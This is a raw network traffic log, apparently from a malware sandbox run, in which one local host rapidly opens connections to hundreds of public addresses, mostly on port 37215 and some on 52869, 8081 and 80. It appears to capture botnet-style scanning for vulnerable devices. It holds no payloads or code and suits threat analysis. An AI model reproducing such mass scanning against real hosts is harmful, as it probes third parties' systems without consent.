                                                Jul 20, 2024 23:05:34.667769909 CEST372155102291.134.129.146192.168.2.14
                                                Jul 20, 2024 23:05:34.667771101 CEST372155255041.206.29.121192.168.2.14
                                                Jul 20, 2024 23:05:34.667771101 CEST3721546882197.26.201.125192.168.2.14
                                                Jul 20, 2024 23:05:34.667772055 CEST3721552518197.49.145.149192.168.2.14
                                                Jul 20, 2024 23:05:34.667773008 CEST372155312041.14.60.190192.168.2.14
                                                Jul 20, 2024 23:05:34.667773008 CEST3721536180157.131.171.170192.168.2.14
                                                Jul 20, 2024 23:05:34.667773962 CEST3721558576157.230.63.1192.168.2.14
                                                Jul 20, 2024 23:05:34.667778969 CEST372155917057.147.31.177192.168.2.14
                                                Jul 20, 2024 23:05:34.667778969 CEST3721546100157.175.25.122192.168.2.14
                                                Jul 20, 2024 23:05:34.667781115 CEST372153755241.45.136.104192.168.2.14
                                                Jul 20, 2024 23:05:34.667783976 CEST3721556002157.155.131.147192.168.2.14
                                                Jul 20, 2024 23:05:34.667784929 CEST3721536208197.143.99.76192.168.2.14
                                                Jul 20, 2024 23:05:34.667784929 CEST3721559524157.252.199.36192.168.2.14
                                                Jul 20, 2024 23:05:34.667785883 CEST372155594241.141.203.96192.168.2.14
                                                Jul 20, 2024 23:05:34.667787075 CEST3721537830157.89.217.112192.168.2.14
                                                Jul 20, 2024 23:05:34.667788029 CEST3721544754167.133.59.154192.168.2.14
                                                Jul 20, 2024 23:05:34.667788029 CEST372155644450.34.155.192192.168.2.14
                                                Jul 20, 2024 23:05:34.667788982 CEST3721552708130.150.233.95192.168.2.14
                                                Jul 20, 2024 23:05:34.667789936 CEST372154334441.75.56.150192.168.2.14
                                                Jul 20, 2024 23:05:34.667789936 CEST372154333241.7.174.17192.168.2.14
                                                Jul 20, 2024 23:05:34.667790890 CEST3721549742197.152.249.5192.168.2.14
                                                Jul 20, 2024 23:05:34.667793989 CEST3721560644106.240.47.148192.168.2.14
                                                Jul 20, 2024 23:05:34.667794943 CEST372153445241.155.35.213192.168.2.14
                                                Jul 20, 2024 23:05:34.667795897 CEST3721532800197.122.120.132192.168.2.14
                                                Jul 20, 2024 23:05:34.667803049 CEST372153414641.124.231.107192.168.2.14
                                                Jul 20, 2024 23:05:34.667820930 CEST372155689647.121.106.191192.168.2.14
                                                Jul 20, 2024 23:05:34.667928934 CEST4490252869192.168.2.14116.137.1.46
                                                Jul 20, 2024 23:05:34.667968988 CEST3721535268157.74.195.83192.168.2.14
                                                Jul 20, 2024 23:05:34.668415070 CEST3721537482197.163.208.222192.168.2.14
                                                Jul 20, 2024 23:05:34.668663979 CEST2645437215192.168.2.1470.62.163.57
                                                Jul 20, 2024 23:05:34.668663979 CEST2645437215192.168.2.14176.127.129.109
                                                Jul 20, 2024 23:05:34.668663979 CEST2645437215192.168.2.1441.74.212.1
                                                Jul 20, 2024 23:05:34.668663979 CEST2645437215192.168.2.14197.169.144.88
                                                Jul 20, 2024 23:05:34.668663979 CEST2645437215192.168.2.14197.113.213.112
                                                Jul 20, 2024 23:05:34.668663979 CEST2645437215192.168.2.1441.17.25.124
                                                Jul 20, 2024 23:05:34.668663979 CEST2645437215192.168.2.14197.251.112.30
                                                Jul 20, 2024 23:05:34.668663979 CEST2645437215192.168.2.1441.97.238.239
                                                Jul 20, 2024 23:05:34.668683052 CEST372153344241.212.223.17192.168.2.14
                                                Jul 20, 2024 23:05:34.668693066 CEST3721555138157.221.219.70192.168.2.14
                                                Jul 20, 2024 23:05:34.668816090 CEST3721548960157.182.60.47192.168.2.14
                                                Jul 20, 2024 23:05:34.669020891 CEST3721553578197.101.55.74192.168.2.14
                                                Jul 20, 2024 23:05:34.669060946 CEST4375452869192.168.2.14103.14.70.39
                                                Jul 20, 2024 23:05:34.669205904 CEST372153840261.98.235.91192.168.2.14
                                                Jul 20, 2024 23:05:34.669291019 CEST372153892041.188.190.222192.168.2.14
                                                Jul 20, 2024 23:05:34.669296980 CEST3721535550157.38.118.86192.168.2.14
                                                Jul 20, 2024 23:05:34.669497013 CEST372153308878.116.111.6192.168.2.14
                                                Jul 20, 2024 23:05:34.669521093 CEST3721533732197.152.47.25192.168.2.14
                                                Jul 20, 2024 23:05:34.669603109 CEST5005280192.168.2.14112.172.7.46
                                                Jul 20, 2024 23:05:34.669935942 CEST3480037215192.168.2.14197.232.70.152
                                                Jul 20, 2024 23:05:34.669935942 CEST6004637215192.168.2.14157.233.107.21
                                                Jul 20, 2024 23:05:34.669935942 CEST3699037215192.168.2.14157.40.221.74
                                                Jul 20, 2024 23:05:34.669935942 CEST4791837215192.168.2.1499.80.150.223
                                                Jul 20, 2024 23:05:34.669935942 CEST5261637215192.168.2.14197.91.156.105
                                                Jul 20, 2024 23:05:34.669935942 CEST4246237215192.168.2.14197.86.55.32
                                                Jul 20, 2024 23:05:34.669935942 CEST5481837215192.168.2.14197.145.253.73
                                                Jul 20, 2024 23:05:34.669935942 CEST4751037215192.168.2.1434.202.46.128
                                                Jul 20, 2024 23:05:34.669950008 CEST372153897244.66.223.184192.168.2.14
                                                Jul 20, 2024 23:05:34.669955969 CEST372154334441.75.56.150192.168.2.14
                                                Jul 20, 2024 23:05:34.670213938 CEST372153700041.88.139.101192.168.2.14
                                                Jul 20, 2024 23:05:34.670262098 CEST3721549980197.21.229.2192.168.2.14
                                                Jul 20, 2024 23:05:34.670483112 CEST3721549302197.1.71.210192.168.2.14
                                                Jul 20, 2024 23:05:34.670731068 CEST2645437215192.168.2.14155.169.229.88
                                                Jul 20, 2024 23:05:34.670731068 CEST2645437215192.168.2.14162.94.214.105
                                                Jul 20, 2024 23:05:34.670731068 CEST5765437215192.168.2.14197.155.87.199
                                                Jul 20, 2024 23:05:34.670731068 CEST2645437215192.168.2.14187.64.166.86
                                                Jul 20, 2024 23:05:34.670731068 CEST2645437215192.168.2.1441.202.249.78
                                                Jul 20, 2024 23:05:34.670732021 CEST2645437215192.168.2.1441.50.50.208
                                                Jul 20, 2024 23:05:34.670732021 CEST2645437215192.168.2.1441.87.18.27
                                                Jul 20, 2024 23:05:34.670732021 CEST2645437215192.168.2.14157.63.244.197
                                                Jul 20, 2024 23:05:34.670903921 CEST3373237215192.168.2.14197.152.47.25
                                                Jul 20, 2024 23:05:34.670903921 CEST3897237215192.168.2.1444.66.223.184
                                                Jul 20, 2024 23:05:34.670903921 CEST3700037215192.168.2.1441.88.139.101
                                                Jul 20, 2024 23:05:34.670903921 CEST4998037215192.168.2.14197.21.229.2
                                                Jul 20, 2024 23:05:34.670903921 CEST4930237215192.168.2.14197.1.71.210
                                                Jul 20, 2024 23:05:34.670903921 CEST2645437215192.168.2.14197.239.103.184
                                                Jul 20, 2024 23:05:34.670999050 CEST2645437215192.168.2.14157.196.176.114
                                                Jul 20, 2024 23:05:34.670999050 CEST2645437215192.168.2.1470.253.211.133
                                                Jul 20, 2024 23:05:34.670999050 CEST2645437215192.168.2.14157.113.23.58
                                                Jul 20, 2024 23:05:34.670999050 CEST2645437215192.168.2.14157.19.208.204
                                                Jul 20, 2024 23:05:34.670999050 CEST2645437215192.168.2.1432.2.223.204
                                                Jul 20, 2024 23:05:34.670999050 CEST2645437215192.168.2.1441.14.10.85
                                                Jul 20, 2024 23:05:34.670999050 CEST3892037215192.168.2.1441.188.190.222
                                                Jul 20, 2024 23:05:34.671000004 CEST5357837215192.168.2.14197.101.55.74
                                                Jul 20, 2024 23:05:34.671081066 CEST3721546926197.1.185.169192.168.2.14
                                                Jul 20, 2024 23:05:34.671684027 CEST3721544460197.183.189.239192.168.2.14
                                                Jul 20, 2024 23:05:34.671788931 CEST410728081192.168.2.14110.77.79.52
                                                Jul 20, 2024 23:05:34.672214031 CEST3721539756157.12.154.103192.168.2.14
                                                Jul 20, 2024 23:05:34.672593117 CEST3721543456197.167.43.41192.168.2.14
                                                Jul 20, 2024 23:05:34.672905922 CEST3721551144136.230.51.161192.168.2.14
                                                Jul 20, 2024 23:05:34.673029900 CEST5196452869192.168.2.14190.147.108.124
                                                Jul 20, 2024 23:05:34.673041105 CEST4333237215192.168.2.1441.7.174.17
                                                Jul 20, 2024 23:05:34.673041105 CEST5644437215192.168.2.1450.34.155.192
                                                Jul 20, 2024 23:05:34.673041105 CEST5952437215192.168.2.14157.252.199.36
                                                Jul 20, 2024 23:05:34.673041105 CEST3755237215192.168.2.1441.45.136.104
                                                Jul 20, 2024 23:05:34.673041105 CEST3618037215192.168.2.14157.131.171.170
                                                Jul 20, 2024 23:05:34.673041105 CEST4688237215192.168.2.14197.26.201.125
                                                Jul 20, 2024 23:05:34.673041105 CEST5255037215192.168.2.1441.206.29.121
                                                Jul 20, 2024 23:05:34.673041105 CEST6083837215192.168.2.14197.127.169.149
                                                Jul 20, 2024 23:05:34.673230886 CEST3721557442157.16.85.248192.168.2.14
                                                Jul 20, 2024 23:05:34.673459053 CEST4600837215192.168.2.14197.164.107.109
                                                Jul 20, 2024 23:05:34.673459053 CEST4809437215192.168.2.14157.153.180.139
                                                Jul 20, 2024 23:05:34.673459053 CEST2645437215192.168.2.1496.177.206.147
                                                Jul 20, 2024 23:05:34.673459053 CEST2645437215192.168.2.14197.168.201.41
                                                Jul 20, 2024 23:05:34.673459053 CEST3654237215192.168.2.14197.81.135.223
                                                Jul 20, 2024 23:05:34.673459053 CEST6031237215192.168.2.14197.160.70.240
                                                Jul 20, 2024 23:05:34.673459053 CEST2645437215192.168.2.14149.146.147.141
                                                Jul 20, 2024 23:05:34.673459053 CEST2645437215192.168.2.1486.52.82.145
                                                Jul 20, 2024 23:05:34.674429893 CEST3721556002157.155.131.147192.168.2.14
                                                Jul 20, 2024 23:05:34.674515009 CEST4896037215192.168.2.14157.182.60.47
                                                Jul 20, 2024 23:05:34.674515009 CEST3344237215192.168.2.1441.212.223.17
                                                Jul 20, 2024 23:05:34.674515009 CEST3414637215192.168.2.1441.124.231.107
                                                Jul 20, 2024 23:05:34.674515009 CEST4740837215192.168.2.14109.251.14.201
                                                Jul 20, 2024 23:05:34.674515009 CEST6064437215192.168.2.14106.240.47.148
                                                Jul 20, 2024 23:05:34.674515009 CEST4974237215192.168.2.14197.152.249.5
                                                Jul 20, 2024 23:05:34.674515009 CEST4475437215192.168.2.14167.133.59.154
                                                Jul 20, 2024 23:05:34.674515009 CEST5594237215192.168.2.1441.141.203.96
                                                Jul 20, 2024 23:05:34.674530983 CEST5286943754103.14.70.39192.168.2.14
                                                Jul 20, 2024 23:05:34.674626112 CEST4375452869192.168.2.14103.14.70.39
                                                Jul 20, 2024 23:05:34.674705029 CEST2645437215192.168.2.14197.168.71.172
                                                Jul 20, 2024 23:05:34.674705029 CEST2645437215192.168.2.1441.96.155.17
                                                Jul 20, 2024 23:05:34.674705029 CEST2645437215192.168.2.14197.205.1.129
                                                Jul 20, 2024 23:05:34.674705029 CEST2645437215192.168.2.1441.176.244.105
                                                Jul 20, 2024 23:05:34.674705029 CEST2645437215192.168.2.14157.85.17.185
                                                Jul 20, 2024 23:05:34.674705029 CEST2645437215192.168.2.1441.67.253.194
                                                Jul 20, 2024 23:05:34.674705029 CEST2645437215192.168.2.14204.51.37.135
                                                Jul 20, 2024 23:05:34.674814939 CEST372155917057.147.31.177192.168.2.14
                                                Jul 20, 2024 23:05:34.674907923 CEST3721551668157.28.53.140192.168.2.14
                                                Jul 20, 2024 23:05:34.674971104 CEST372154423241.219.3.184192.168.2.14
                                                Jul 20, 2024 23:05:34.675206900 CEST3721534800197.232.70.152192.168.2.14
                                                Jul 20, 2024 23:05:34.675323963 CEST2645437215192.168.2.1441.121.158.33
                                                Jul 20, 2024 23:05:34.675324917 CEST2645437215192.168.2.1441.171.2.165
                                                Jul 20, 2024 23:05:34.675324917 CEST2645437215192.168.2.14197.208.158.70
                                                Jul 20, 2024 23:05:34.675324917 CEST2645437215192.168.2.14197.44.182.98
                                                Jul 20, 2024 23:05:34.675324917 CEST2645437215192.168.2.1441.215.142.215
                                                Jul 20, 2024 23:05:34.675324917 CEST2645437215192.168.2.1441.208.227.202
                                                Jul 20, 2024 23:05:34.675339937 CEST8050052112.172.7.46192.168.2.14
                                                Jul 20, 2024 23:05:34.675348997 CEST37215604541.160.229.40192.168.2.14
                                                Jul 20, 2024 23:05:34.675390959 CEST5005280192.168.2.14112.172.7.46
                                                Jul 20, 2024 23:05:34.676058054 CEST3721560046157.233.107.21192.168.2.14
                                                Jul 20, 2024 23:05:34.676068068 CEST3721536990157.40.221.74192.168.2.14
                                                Jul 20, 2024 23:05:34.676145077 CEST5550437215192.168.2.1490.121.157.161
                                                Jul 20, 2024 23:05:34.676145077 CEST5848437215192.168.2.14151.249.104.249
                                                Jul 20, 2024 23:05:34.676145077 CEST5208437215192.168.2.14197.36.42.86
                                                Jul 20, 2024 23:05:34.676145077 CEST3851637215192.168.2.1464.130.174.77
                                                Jul 20, 2024 23:05:34.676145077 CEST4126237215192.168.2.1441.124.78.80
                                                Jul 20, 2024 23:05:34.676145077 CEST5704437215192.168.2.1441.179.93.180
                                                Jul 20, 2024 23:05:34.676145077 CEST5184437215192.168.2.14183.188.212.130
                                                Jul 20, 2024 23:05:34.676145077 CEST4995037215192.168.2.14157.76.186.37
                                                Jul 20, 2024 23:05:34.676760912 CEST3721557654197.155.87.199192.168.2.14
                                                Jul 20, 2024 23:05:34.676832914 CEST2645437215192.168.2.14197.105.100.5
                                                Jul 20, 2024 23:05:34.676832914 CEST4930237215192.168.2.14197.1.71.210
                                                Jul 20, 2024 23:05:34.676832914 CEST3700037215192.168.2.1441.88.139.101
                                                Jul 20, 2024 23:05:34.676834106 CEST3373237215192.168.2.14197.152.47.25
                                                Jul 20, 2024 23:05:34.676834106 CEST3555037215192.168.2.14157.38.118.86
                                                Jul 20, 2024 23:05:34.676834106 CEST3840237215192.168.2.1461.98.235.91
                                                Jul 20, 2024 23:05:34.676834106 CEST5513837215192.168.2.14157.221.219.70
                                                Jul 20, 2024 23:05:34.676834106 CEST5689637215192.168.2.1447.121.106.191
                                                Jul 20, 2024 23:05:34.677146912 CEST3721540842190.164.230.172192.168.2.14
                                                Jul 20, 2024 23:05:34.677151918 CEST3721556302198.45.18.250192.168.2.14
                                                Jul 20, 2024 23:05:34.677156925 CEST3721541910157.98.20.252192.168.2.14
                                                Jul 20, 2024 23:05:34.677301884 CEST372155495041.65.214.53192.168.2.14
                                                Jul 20, 2024 23:05:34.677310944 CEST372154318041.51.127.171192.168.2.14
                                                Jul 20, 2024 23:05:34.677315950 CEST3721557942157.100.189.26192.168.2.14
                                                Jul 20, 2024 23:05:34.677325010 CEST3721543644197.170.178.75192.168.2.14
                                                Jul 20, 2024 23:05:34.677330017 CEST3721544942180.149.134.73192.168.2.14
                                                Jul 20, 2024 23:05:34.677337885 CEST3721554762197.94.74.21192.168.2.14
                                                Jul 20, 2024 23:05:34.677342892 CEST3721536848164.152.114.92192.168.2.14
                                                Jul 20, 2024 23:05:34.677350998 CEST3721549376116.132.59.169192.168.2.14
                                                Jul 20, 2024 23:05:34.677356005 CEST372153676441.74.40.186192.168.2.14
                                                Jul 20, 2024 23:05:34.677365065 CEST3721543704197.213.57.205192.168.2.14
                                                Jul 20, 2024 23:05:34.677370071 CEST3721543206133.62.206.236192.168.2.14
                                                Jul 20, 2024 23:05:34.677375078 CEST3721560812157.27.2.225192.168.2.14
                                                Jul 20, 2024 23:05:34.677383900 CEST372153613441.205.179.211192.168.2.14
                                                Jul 20, 2024 23:05:34.677387953 CEST3721560696157.227.113.44192.168.2.14
                                                Jul 20, 2024 23:05:34.677392006 CEST3721553414157.130.208.54192.168.2.14
                                                Jul 20, 2024 23:05:34.677401066 CEST3721548346197.47.165.186192.168.2.14
                                                Jul 20, 2024 23:05:34.677405119 CEST3721545864197.27.127.22192.168.2.14
                                                Jul 20, 2024 23:05:34.677418947 CEST372154958014.63.31.137192.168.2.14
                                                Jul 20, 2024 23:05:34.677427053 CEST3721556584221.229.167.177192.168.2.14
                                                Jul 20, 2024 23:05:34.677428961 CEST3721541154197.219.167.144192.168.2.14
                                                Jul 20, 2024 23:05:34.677436113 CEST372153989641.19.68.136192.168.2.14
                                                Jul 20, 2024 23:05:34.677437067 CEST3721537880157.162.164.93192.168.2.14
                                                Jul 20, 2024 23:05:34.677442074 CEST372153864445.182.212.164192.168.2.14
                                                Jul 20, 2024 23:05:34.677443981 CEST372155966841.17.43.162192.168.2.14
                                                Jul 20, 2024 23:05:34.677447081 CEST372155427641.13.154.17192.168.2.14
                                                Jul 20, 2024 23:05:34.677457094 CEST3721551272157.146.42.35192.168.2.14
                                                Jul 20, 2024 23:05:34.677460909 CEST3721539384170.233.211.253192.168.2.14
                                                Jul 20, 2024 23:05:34.677630901 CEST3721555664208.191.39.47192.168.2.14
                                                Jul 20, 2024 23:05:34.677635908 CEST3721552160197.38.238.183192.168.2.14
                                                Jul 20, 2024 23:05:34.677649975 CEST372155874432.8.164.81192.168.2.14
                                                Jul 20, 2024 23:05:34.677659988 CEST3721551850197.26.32.199192.168.2.14
                                                Jul 20, 2024 23:05:34.677671909 CEST372154924441.42.206.73192.168.2.14
                                                Jul 20, 2024 23:05:34.677675962 CEST3721541276157.38.20.146192.168.2.14
                                                Jul 20, 2024 23:05:34.677685022 CEST3721555632157.37.121.244192.168.2.14
                                                Jul 20, 2024 23:05:34.677689075 CEST372153419441.254.196.153192.168.2.14
                                                Jul 20, 2024 23:05:34.677697897 CEST372155092875.163.132.69192.168.2.14
                                                Jul 20, 2024 23:05:34.677702904 CEST372154791899.80.150.223192.168.2.14
                                                Jul 20, 2024 23:05:34.677711010 CEST808141072110.77.79.52192.168.2.14
                                                Jul 20, 2024 23:05:34.677715063 CEST3721552616197.91.156.105192.168.2.14
                                                Jul 20, 2024 23:05:34.677717924 CEST2645437215192.168.2.14197.80.137.234
                                                Jul 20, 2024 23:05:34.677717924 CEST2645437215192.168.2.14178.163.147.89
                                                Jul 20, 2024 23:05:34.677717924 CEST2645437215192.168.2.1441.208.110.248
                                                Jul 20, 2024 23:05:34.677717924 CEST495188081192.168.2.14142.133.220.119
                                                Jul 20, 2024 23:05:34.677717924 CEST2645437215192.168.2.1441.124.95.227
                                                Jul 20, 2024 23:05:34.677717924 CEST2645437215192.168.2.14157.240.88.96
                                                Jul 20, 2024 23:05:34.677717924 CEST2645437215192.168.2.14200.67.132.179
                                                Jul 20, 2024 23:05:34.677717924 CEST2645437215192.168.2.14197.197.32.221
                                                Jul 20, 2024 23:05:34.677752972 CEST410728081192.168.2.14110.77.79.52
                                                Jul 20, 2024 23:05:34.677817106 CEST3721542462197.86.55.32192.168.2.14
                                                Jul 20, 2024 23:05:34.677937984 CEST3721554818197.145.253.73192.168.2.14
                                                Jul 20, 2024 23:05:34.678072929 CEST372154333241.7.174.17192.168.2.14
                                                Jul 20, 2024 23:05:34.678246021 CEST3620837215192.168.2.14197.143.99.76
                                                Jul 20, 2024 23:05:34.678246021 CEST4610037215192.168.2.14157.175.25.122
                                                Jul 20, 2024 23:05:34.678246021 CEST5857637215192.168.2.14157.230.63.1
                                                Jul 20, 2024 23:05:34.678246021 CEST5102237215192.168.2.1491.134.129.146
                                                Jul 20, 2024 23:05:34.678246021 CEST2645437215192.168.2.14197.235.102.53
                                                Jul 20, 2024 23:05:34.678246021 CEST5251837215192.168.2.14197.49.145.149
                                                Jul 20, 2024 23:05:34.678246021 CEST2645437215192.168.2.1441.114.157.137
                                                Jul 20, 2024 23:05:34.678246021 CEST2645437215192.168.2.14191.91.41.96
                                                Jul 20, 2024 23:05:34.678369045 CEST5286951964190.147.108.124192.168.2.14
                                                Jul 20, 2024 23:05:34.678374052 CEST372154751034.202.46.128192.168.2.14
                                                Jul 20, 2024 23:05:34.678416967 CEST5196452869192.168.2.14190.147.108.124
                                                Jul 20, 2024 23:05:34.678574085 CEST372155644450.34.155.192192.168.2.14
                                                Jul 20, 2024 23:05:34.678812027 CEST3721546008197.164.107.109192.168.2.14
                                                Jul 20, 2024 23:05:34.678927898 CEST3721559524157.252.199.36192.168.2.14
                                                Jul 20, 2024 23:05:34.678934097 CEST3721548094157.153.180.139192.168.2.14
                                                Jul 20, 2024 23:05:34.679207087 CEST372153892041.188.190.222192.168.2.14
                                                Jul 20, 2024 23:05:34.679255009 CEST2645437215192.168.2.1412.157.227.73
                                                Jul 20, 2024 23:05:34.679255009 CEST5952837215192.168.2.14193.24.185.130
                                                Jul 20, 2024 23:05:34.679255009 CEST4333837215192.168.2.14197.144.99.86
                                                Jul 20, 2024 23:05:34.679255009 CEST3950637215192.168.2.14157.51.200.31
                                                Jul 20, 2024 23:05:34.679255009 CEST2645437215192.168.2.14157.207.127.188
                                                Jul 20, 2024 23:05:34.679255009 CEST2645437215192.168.2.14197.52.98.160
                                                Jul 20, 2024 23:05:34.679255009 CEST2645437215192.168.2.1447.179.50.213
                                                Jul 20, 2024 23:05:34.679255009 CEST2645437215192.168.2.1441.12.50.91
                                                Jul 20, 2024 23:05:34.679702997 CEST3721553578197.101.55.74192.168.2.14
                                                Jul 20, 2024 23:05:34.679760933 CEST372153755241.45.136.104192.168.2.14
                                                Jul 20, 2024 23:05:34.679898024 CEST5695852869192.168.2.14102.124.228.209
                                                Jul 20, 2024 23:05:34.679955006 CEST3721548960157.182.60.47192.168.2.14
                                                Jul 20, 2024 23:05:34.680576086 CEST3526837215192.168.2.14157.74.195.83
                                                Jul 20, 2024 23:05:34.680576086 CEST3280037215192.168.2.14197.122.120.132
                                                Jul 20, 2024 23:05:34.680576086 CEST5312037215192.168.2.1441.14.60.190
                                                Jul 20, 2024 23:05:34.680576086 CEST2645437215192.168.2.14177.137.235.243
                                                Jul 20, 2024 23:05:34.680576086 CEST2645437215192.168.2.14197.59.10.121
                                                Jul 20, 2024 23:05:34.680576086 CEST2645437215192.168.2.14142.240.55.156
                                                Jul 20, 2024 23:05:34.680576086 CEST4998037215192.168.2.14197.21.229.2
                                                Jul 20, 2024 23:05:34.680747032 CEST3721536180157.131.171.170192.168.2.14
                                                Jul 20, 2024 23:05:34.680752039 CEST372153344241.212.223.17192.168.2.14
                                                Jul 20, 2024 23:05:34.680763006 CEST3721546882197.26.201.125192.168.2.14
                                                Jul 20, 2024 23:05:34.680942059 CEST372153414641.124.231.107192.168.2.14
                                                Jul 20, 2024 23:05:34.680948019 CEST372155255041.206.29.121192.168.2.14
                                                Jul 20, 2024 23:05:34.681040049 CEST3721547408109.251.14.201192.168.2.14
                                                Jul 20, 2024 23:05:34.681044102 CEST3721560644106.240.47.148192.168.2.14
                                                Jul 20, 2024 23:05:34.681200981 CEST2645437215192.168.2.1441.125.214.40
                                                Jul 20, 2024 23:05:34.681200981 CEST2645437215192.168.2.14144.175.143.141
                                                Jul 20, 2024 23:05:34.681200981 CEST2645437215192.168.2.14197.207.154.219
                                                Jul 20, 2024 23:05:34.681200981 CEST3753252869192.168.2.14145.195.83.181
                                                Jul 20, 2024 23:05:34.681200981 CEST6039880192.168.2.14112.92.81.173
                                                Jul 20, 2024 23:05:34.681200981 CEST2645437215192.168.2.1434.251.208.234
                                                Jul 20, 2024 23:05:34.681200981 CEST2645437215192.168.2.1440.24.9.103
                                                Jul 20, 2024 23:05:34.681200981 CEST2645437215192.168.2.14154.203.220.236
                                                Jul 20, 2024 23:05:34.681293011 CEST3721560838197.127.169.149192.168.2.14
                                                Jul 20, 2024 23:05:34.681298018 CEST3721549742197.152.249.5192.168.2.14
                                                Jul 20, 2024 23:05:34.681557894 CEST2645437215192.168.2.14157.68.19.253
                                                Jul 20, 2024 23:05:34.681557894 CEST2645437215192.168.2.14157.157.247.178
                                                Jul 20, 2024 23:05:34.681557894 CEST2645437215192.168.2.1489.110.22.12
                                                Jul 20, 2024 23:05:34.681557894 CEST2645437215192.168.2.1441.118.191.62
                                                Jul 20, 2024 23:05:34.681557894 CEST3506280192.168.2.14112.156.142.30
                                                Jul 20, 2024 23:05:34.681557894 CEST2645437215192.168.2.14178.60.140.231
                                                Jul 20, 2024 23:05:34.681557894 CEST2645437215192.168.2.14197.103.58.85
                                                Jul 20, 2024 23:05:34.681557894 CEST442648081192.168.2.14180.75.17.172
                                                Jul 20, 2024 23:05:34.681823015 CEST2645437215192.168.2.14197.144.144.114
                                                Jul 20, 2024 23:05:34.681823015 CEST2645437215192.168.2.14157.110.219.252
                                                Jul 20, 2024 23:05:34.681823015 CEST2645437215192.168.2.1441.138.65.24
                                                Jul 20, 2024 23:05:34.681823015 CEST2645437215192.168.2.14105.14.54.100
                                                Jul 20, 2024 23:05:34.681823015 CEST2645437215192.168.2.1441.232.10.243
                                                Jul 20, 2024 23:05:34.681823015 CEST2645437215192.168.2.14111.137.238.205
                                                Jul 20, 2024 23:05:34.681823015 CEST2645437215192.168.2.14157.231.253.49
                                                Jul 20, 2024 23:05:34.681823015 CEST2645437215192.168.2.1441.193.96.250
                                                Jul 20, 2024 23:05:34.681890011 CEST3721544754167.133.59.154192.168.2.14
                                                Jul 20, 2024 23:05:34.681924105 CEST372155550490.121.157.161192.168.2.14
                                                Jul 20, 2024 23:05:34.682111025 CEST3721536542197.81.135.223192.168.2.14
                                                Jul 20, 2024 23:05:34.682116985 CEST3721560312197.160.70.240192.168.2.14
                                                Jul 20, 2024 23:05:34.682163000 CEST446048081192.168.2.1413.58.205.72
                                                Jul 20, 2024 23:05:34.682487011 CEST3721558484151.249.104.249192.168.2.14
                                                Jul 20, 2024 23:05:34.682596922 CEST3721552084197.36.42.86192.168.2.14
                                                Jul 20, 2024 23:05:34.682964087 CEST3897237215192.168.2.1444.66.223.184
                                                Jul 20, 2024 23:05:34.682964087 CEST3748237215192.168.2.14197.163.208.222
                                                Jul 20, 2024 23:05:34.682964087 CEST5270837215192.168.2.14130.150.233.95
                                                Jul 20, 2024 23:05:34.682964087 CEST3445237215192.168.2.1441.155.35.213
                                                Jul 20, 2024 23:05:34.682964087 CEST3854837215192.168.2.1441.145.104.135
                                                Jul 20, 2024 23:05:34.682964087 CEST2645437215192.168.2.1441.116.190.228
                                                Jul 20, 2024 23:05:34.682964087 CEST2645437215192.168.2.14197.131.18.165
                                                Jul 20, 2024 23:05:34.682964087 CEST2645437215192.168.2.14157.0.36.222
                                                Jul 20, 2024 23:05:34.682976961 CEST3721549302197.1.71.210192.168.2.14
                                                Jul 20, 2024 23:05:34.683031082 CEST4032652869192.168.2.1491.48.213.35
                                                Jul 20, 2024 23:05:34.683135986 CEST372155594241.141.203.96192.168.2.14
                                                Jul 20, 2024 23:05:34.683258057 CEST372153700041.88.139.101192.168.2.14
                                                Jul 20, 2024 23:05:34.683501959 CEST3379880192.168.2.14112.138.231.204
                                                Jul 20, 2024 23:05:34.683665037 CEST372153851664.130.174.77192.168.2.14
                                                Jul 20, 2024 23:05:34.683954000 CEST3721533732197.152.47.25192.168.2.14
                                                Jul 20, 2024 23:05:34.684067965 CEST2645437215192.168.2.14161.108.94.20
                                                Jul 20, 2024 23:05:34.684067965 CEST2645437215192.168.2.14197.126.43.234
                                                Jul 20, 2024 23:05:34.684067965 CEST2645437215192.168.2.14197.8.168.32
                                                Jul 20, 2024 23:05:34.684067965 CEST2645437215192.168.2.1493.136.213.232
                                                Jul 20, 2024 23:05:34.684067965 CEST2645437215192.168.2.1441.144.209.211
                                                Jul 20, 2024 23:05:34.684068918 CEST2645437215192.168.2.1467.132.15.129
                                                Jul 20, 2024 23:05:34.684068918 CEST2645437215192.168.2.1447.6.99.38
                                                Jul 20, 2024 23:05:34.684068918 CEST2645437215192.168.2.14197.73.16.180
                                                Jul 20, 2024 23:05:34.684216022 CEST372154126241.124.78.80192.168.2.14
                                                Jul 20, 2024 23:05:34.684736967 CEST3721536208197.143.99.76192.168.2.14
                                                Jul 20, 2024 23:05:34.684750080 CEST337048081192.168.2.14144.70.81.171
                                                Jul 20, 2024 23:05:34.684817076 CEST372155704441.179.93.180192.168.2.14
                                                Jul 20, 2024 23:05:34.684822083 CEST3783037215192.168.2.14157.89.217.112
                                                Jul 20, 2024 23:05:34.684822083 CEST3721535550157.38.118.86192.168.2.14
                                                Jul 20, 2024 23:05:34.684822083 CEST2645437215192.168.2.14157.35.171.1
                                                Jul 20, 2024 23:05:34.684822083 CEST2645437215192.168.2.1441.22.186.127
                                                Jul 20, 2024 23:05:34.684822083 CEST2645437215192.168.2.1441.208.188.114
                                                Jul 20, 2024 23:05:34.684822083 CEST2645437215192.168.2.14197.80.79.157
                                                Jul 20, 2024 23:05:34.684822083 CEST2645437215192.168.2.1441.92.195.247
                                                Jul 20, 2024 23:05:34.684822083 CEST2645437215192.168.2.14191.53.240.103
                                                Jul 20, 2024 23:05:34.684822083 CEST575248081192.168.2.14205.224.252.166
                                                Jul 20, 2024 23:05:34.684834003 CEST3721551844183.188.212.130192.168.2.14
                                                Jul 20, 2024 23:05:34.684839010 CEST3721546100157.175.25.122192.168.2.14
                                                Jul 20, 2024 23:05:34.684901953 CEST2645437215192.168.2.14180.34.137.81
                                                Jul 20, 2024 23:05:34.684901953 CEST2645437215192.168.2.14197.141.187.145
                                                Jul 20, 2024 23:05:34.684901953 CEST562148081192.168.2.14180.122.237.60
                                                Jul 20, 2024 23:05:34.684901953 CEST2645437215192.168.2.14218.49.223.59
                                                Jul 20, 2024 23:05:34.684901953 CEST5513652869192.168.2.14114.225.14.65
                                                Jul 20, 2024 23:05:34.684901953 CEST2645437215192.168.2.1441.216.136.43
                                                Jul 20, 2024 23:05:34.684901953 CEST2645437215192.168.2.14197.234.114.168
                                                Jul 20, 2024 23:05:34.684901953 CEST3308837215192.168.2.1478.116.111.6
                                                Jul 20, 2024 23:05:34.684916973 CEST3721549950157.76.186.37192.168.2.14
                                                Jul 20, 2024 23:05:34.684921980 CEST3721558576157.230.63.1192.168.2.14
